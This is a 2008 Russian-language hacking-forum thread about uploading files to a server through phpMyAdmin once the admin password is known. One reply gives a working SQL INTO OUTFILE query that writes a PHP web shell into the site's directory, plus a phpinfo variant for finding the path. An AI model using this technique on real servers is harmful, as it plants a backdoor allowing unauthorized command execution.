ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

phpmyadmin
  #1  
Старый 27.11.2008, 18:08
Аватар для sadfeel
sadfeel
Познающий
Регистрация: 05.11.2008
Сообщений: 79
Провел на форуме:
185461

Репутация: 12
По умолчанию phpmyadmin

можно ли както залить файл на сервер через phpMyadmin если известен пас на админку? если да то как?

Последний раз редактировалось sadfeel; 27.11.2008 в 19:10..
 

  #2  
Старый 27.11.2008, 18:15
Аватар для Rebz
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

можно
встречный вопрос - юзал поиск?
 

  #3  
Старый 27.11.2008, 20:25
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

можно попробывать через мускуль(into out file), конечно если есть file priv и подходяшая дира(с возможностью записи).
 

  #4  
Старый 27.11.2008, 20:59
Аватар для cash$$$
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

sadfeel

Если залить БД на сервер, то вариантов несколько;

Если БД данными не сильно наполнена! То у себя локально делаешь дамп структура+данные, в случае если у тебя структура не создана на хостере, иначе просто данные. Заходишь в phpmyadmin , выбираешь свою БД, кликаешь на sql-запрос, копируешь содержимое своего дампа в окно запроса, корректишь имя БД или хоста, ну и жмешь кнопку "Пошел".
Если БД заполнена данными конкретно. Делаешь дамп только структуры своей БД. Создаешь ее тем же phpmyadmin'ом у хостера. Делаешь у себя в локальной БД выгрузку данных обычным запросом: сколько таблиц, столько и файлов получишь. Потом эти файлы также можно загрузить в phpmyadmin, при помощи фичи - загрузка данных через файл.
Если хостер позволяет удаленно подключаться тем же MySQL Front или MySQL CC, то можно прямо с API любого все сделать.

Если залить шелл через PHPmyadmin, то можно попробывать зделать следующие:

если есть права на запись, выполняй запрос

Код:
SELECT '<?php system($cmd) ?>' FROM `table` INTO OUTFILE '/home/site/www/dir/shell.php'
/home/site/www/dir/shell.php- Подставляешь свое значение.

в phpmyadmin много способов узнать локальный путь например: какой-нибудь файл который обычно не вызывается на прямую а только инклудится, а поэтому можно попробовать select '<? phpinfo(); ?>' into outfile '/path_to_phpmyadmin/shell.php'

Если пишет #1045 - Access denied for user 'name'@'localhost' (using password: YES)

то значит нет прав на заливку.
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PhpMyAdmin dimauz Уязвимости 21 26.01.2007 23:06
Уязвимости phpMyAdmin 2.6.0-pl2 yanus Уязвимости 1 13.03.2006 13:48
Как залить шелл через PhpMyAdmin? Buga Форумы 15 16.02.2006 22:18
Залить remview.php через phpMyAdmin Grom PHP, PERL, MySQL, JavaScript 8 05.02.2006 00:19
Как через phpmyadmin запрость данные пользователей ? Майор Форумы 3 26.12.2004 02:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ